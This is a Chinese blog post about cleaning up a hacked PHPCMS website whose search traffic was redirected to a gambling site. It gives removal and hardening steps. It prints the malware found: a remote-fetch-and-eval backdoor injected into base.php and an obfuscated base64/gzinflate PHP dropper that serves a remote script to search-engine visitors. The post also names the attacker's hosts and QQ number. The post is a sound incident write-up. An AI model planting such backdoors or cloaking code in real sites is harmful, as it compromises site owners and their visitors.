记一次phpcms反黑过程

最新推荐文章于 2023-01-08 16:47:10 发布
最新推荐文章于 2023-01-08 16:47:10 发布
阅读量438 收藏
点赞数 1
分类专栏: 反黑 文章标签: 反黑 phpcms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leexiangg/article/details/103348795
版权

一、修复方式

如果你的phpcms被攻击了,通过百度搜索进入网站的时候,跳转到“×××赌博城”之类的网站,那么可以如下处理:

1、检查phpcms/base.php中,是否被修改。如果修改了,把被加入的东西删除。

我的是被加入了如下代码:

$gif="http://www.imagesspider.com/js.gif";
$str=@ file_get_contents($gif);
eval($str);

2、还有网站根目录下新增了很多php文件。

内容如下:

<?php
error_reporting(0);
set_time_limit(0);
$ref = $_SERVER['HTTP_REFERER'];
if (stristr($ref, 'baidu.com') !== false || stristr($ref, 'sogou.com') !== false|| stristr($ref, 'so.com') !== false || stristr($ref, 'sm.cn') !== false) {
    echo '<script src="http://js.baiduspiderjpg.com/js/seo.js" rel="nofollow"></script>';
exit;
}
$url1 = $_SERVER['PHP_SELF'];  
$name= substr($url1 ,strrpos($url1 ,'/')+1 );
chmod($name,0444);
$str2="XY7BUoMwGIQfyAuFYulRQQIEFIJNkFvCL7SQpMzIhOLTGw+99LCXnd39toyOK09eMEf03CK64TCLhOs7LfOdnBK/Q6fnNCHyO6kMT8giomXkKN46lzolg0sxFrfiks4f6zx9NUQ2LpGtinciIT0gubTNbISi/X8eh1CdpkLjzx+cvb0boYm06gVLh7J+VZzdbB8kxMfx/qHbBm25ThddTe6BB5u/58xfgc2zUDABy0yu7FYd6FztnMbLzkJVV1zvdf776E2HUFH7Pxge+IdwDJ7+AA==";
$r='s'.chr(11*10+6).'r_repl'.chr(3*33+1-3).'ce';$cc='lchr';
$cc=$r('l','',$cc);
$b=$cc(90*1+8).'ase'.(8*8*1).$cc(2*50-5).'de'.$r(',','c',',').$r(',','od',',').'e';
$g='gzinflate';$str2=$b($str2);$str=$g($str2);
eval("?>".$b($str));?>

把这些文件删除即可。

3、设置目录权限,网站根目录不可写,设置框架php文件不可更改。

4、定期检查网站是否正常。

 

二、其他网友的方式

1、https://blog.csdn.net/znh_dyt/article/details/77498905

解决办法。 
1.前台注册基本的安全考虑 防 sql注入,防XSS,防爆破 
2.开启系统自带的短信验证 邮箱验证,这些东东与用户一一对应。 
3.缩短用户名的需求,正则 ajax 验证,jq的form验证。 
4.加入token。 
5.限流 IP 时间段限制。 
6.最后不得已来一招 重新部署。 
最后 建议能升级还是优先打补丁升级。

2、https://baijiahao.baidu.com/s?id=1628520504298507001&wfr=spider&for=pc

PC的核心文件是根目录下的phpcms文件和phpsso_server文件,这两个文件是PC最重要的地方!只要把这两个文件改名及路径处理,网站ec的安全能提升很多。

 

三、心酸反黑路

前端时间,我哥和我说,我们的一个网站被黑,百度搜索的时候,显示的是“×××赌博城”的链接。

这个网站挺老了,源码也找不到,phpcms框架的东西也改了不少,也不能直接替换框架来解决问题。

通过跳转跟踪,发现跳转的网页内容是:

<script src="http://js.baiduspiderjpg.com/js/seo.js" rel="nofollow"></script>

关键字搜索“baiduspiderjpg”,发现根目录下type.php等一堆文件是新上传的。删掉以后还是不行。

那只能用最笨的办法,分析代码了。我从index.php开始检查代码,逐个看调用到的代码中是否有类似木马的代码,眼拙的我最开始漏过了bash.php的那几行代码。后来实在找不到,后来突然想到,如果想执行隐蔽代码,必然使用eval方法,全局搜索关键字eval,果然找到了。

 

当时解决不了的时候又想了其他办法,解决不了问题,那能不能解决造成问题的人呢?

这个黑客为了推广他的黑客程序,在代码中加入qq号推广:

加他QQ先骂了再说,然后他说他是卖黑客程序的,抓住把柄了,举报一波:

什么?举报了才限制加好友?而且只限制了一天。原来是腾讯收了黑钱,人家是SVIP,怪不得。

网警110再举报一波,两天了,结果还没下来。

而且百度上一搜这个qq号,几百页都是被黑的网站,竟然没有人管管这个源头。

 

如果你是大神,看到这篇文章,是否可以帮忙解决源头的这帮孙子,毕竟我们的警察大人不管屁民的这些事,只会给你打电话,和你说你的网站被黑了啊,自己解决,否则追究你责任。

解决的东西包括:

qq号:499995885

网站:

www.imagesspider.com

js.baiduspiderjpg.com

www.4503774.com:5678

 

杍羭
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
加密技术-反黑引擎
virbox的博客
11-21 961
文章目录反黑引擎(AHS)特点和功能:对应行业参考:简介:愿景:功能:高级的进程防护基于黑名单特征库的进程模块查杀内存防护价值 反黑引擎(AHS)特点和功能: 高级的进程防护 基于黑名单特征库的进程模块查杀 内存防护 可疑进程模块上传 对应行业参考: 通用软件开发商 、街机、游戏机开发商 、网游软件、银行证券软件等 简介: 反黑引擎是由内核态保护组件,可疑对象上传组件和反黑特征数据库组件组成,...
PHPCMS二次开发教程
05-06
hpcms二次开发教程打包下载包含模板制作,希望资源可以帮到你 包括: SEOtitie优化、更换后台编辑器、增加全站搜索、if语句、后台样式修改、响应式指向性访问、分页样式修改、缩略图优化、选项字段优化、表单优化、...
关于phpcms最近有被黑的情况
znh_dyt的博客
08-23 841
近日: 项目上线,陆陆续续的出现一些问题。有各种恶意添加用户的情况,虽然没有造成经济损失,但是同仁觉得很烦。我就找了一下原因,该用的方法都已近尝试了,然后我就依靠外部找了一些简单解决办法。 1.前台注册基本的安全考虑 防 sql注入,防XSS,防爆破 2.开启系统自带的短信验证 邮箱验证,这些东东与用户一一对应。 3.缩短用户名的需求,正则 ajax 验证,jq的
反黑方法
weixin_33699914的博客
10-05 282
作者:田逸([email]sery@163.com[/email])发表在《网管员世界》04年第7期69页 题目改为“反黑”   前几天为了测试某一个机构的域名解析是否可用,我就在一台邮件服务器上起用了iis,并为此机构创建了域名,放了一个简单的html页面文件做测试。可是今天早上我收电子邮件(用foxmail 4.2),一直收不了,我以为是有超大邮件,于是就用web 方式直接登录邮件服务器收...
android反黑教程,Android 一些小问题
weixin_28872105的博客
06-02 93
有时候遇到一些看起来很奇怪的问题。在这里一并录一下。1、ListView拖动反黑List正常显示,但是一拖动,整个背景就变成黑色。停止拖动后,颜色又变回正常。解决方法:在Layout文件中设置ListView的属性:android:scrollingCache="false"2、ListView默认点击样式失效ListView是有默认点击样式的当设置了Item的background为某种颜色或某...
phpcms2008网站漏洞如何修复 远程代码写入缓存漏洞利用
网站安全专家
12-03 751
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析。 phpcms2008是国内深受站长建站使用的一个内容CMS管理系统,phpcms的开源话,免费,动态,静态生成,API接口...
PHPCMS中实现网站变成黑白的方法代码
09-29
关键字描述:PHPCMS 站长 实现 界面 网站 黑白 方法 代码 哀悼 已经在PHPCMS内核下能正常实现 演示:www.gnhao.com 代码不会添加,请联系我qq504470653 我会协助你帮你加上的 首先,在此沉痛哀悼5.12地震中遇难...
phpcms文章页如何显示上一页下一页
09-29
phpcms文章页要显示上一页下一页效果并不难,下面的代码大家不妨参考下,或许有所帮助
phpcms手机内容页面添加上一篇和下一篇
10-24
本文给大家分享的是在phpcms中的手机内容详情页里添加上一篇和下一篇的方法,十分的简单实用,有需要的小伙伴可以参考下。
phpcms黑色模板后台-v9后端模板-phpcms模板.zip
10-17
由于官方后台不好看,而且对客户来说使用过程中容易起各种纠纷,该后台模板全新黑色后台,去除了官方版权等,而且全新的登录页面,给客户一种视觉享受。
PHP实例开发源码——phpaaCMS php文章管理系统 utf-8.zip
12-01
PHP实例开发源码——phpaaCMS php文章管理系统 utf-8.zip
简单文章管理系统(phpaaCMS) v0.5.rar
07-09
phpaaCMS是一个十分简易的文章管理系统! 适合php程序员做一些功能十分简单的小型网站。 新增数据备份、数据恢复功能 修正若干Bug
phpaaCMS 文章系统 v0.5
11-09
一个十分简洁的PHP文章管理系统,你可以利用本程序修改成一些比较简单的文章系统,学习PHP的朋友,也可以拿去学习研究了,后台说要有页面管理、公告管理、友情链接管理、文件管理、栏目管理、文章管理等。phpaaCMS 文章系统本次更新:新增数据备份、数据恢复功能,修正若干Bug。
phpcms攻击的解决方案
qq_16144799的博客
04-21 1113
1.搜索跳转到博彩网站:被挂马,需要检查所有html页面是否有 这种标签里面的内容需要全部删除,可以利用www目录下的文件 debug.js进行批量删除 debug.js运行方式通过ssh进入到www目录下以后执行node deBug.js 如果还有的话phpcms就检查/caches/configs/database.php里面是否有木马文件 ,检查caches\configs是否有c...
【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
cc1988429的专栏
10-12 7105
考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。 湛蓝天空 声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试
php中转注入,phpcms authkey注入中转脚本
weixin_28701593的博客
03-16 137
set_time_limit(0);$wang_url='http://www.0day5.com';$auth_key='xxxxxxxxxxxxxxxxxxxxxxxxxxxx';$str="uid=1".stripslashes($_GET['id']);$encode=sys_auth($str,'ENCODE',$auth_key);$content=file_g...
DAY25:逻辑漏洞复现
qq_49433473的博客
08-08 1097
phpaacms垂直漏洞复现 Catfishcms水平越权漏洞复现 大米cms--0元支付逻辑漏洞 Bugscan--支付竞争漏洞
分享112个PHP源码,总有一款适合您
zy0412326的专栏
01-08 1474
php
phpcms v9编写一个查询文章的接口
最新发布
05-30
要编写一个查询文章的接口,可以参考以下步骤: 1. 创建一个PHP文件,命名为“get_articles.php”(或其他你喜欢的名称)。 2. 在文件中编写代码,连接到PHPcms v9的数据库,并查询文章信息。可以使用PHPcms v9自带...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值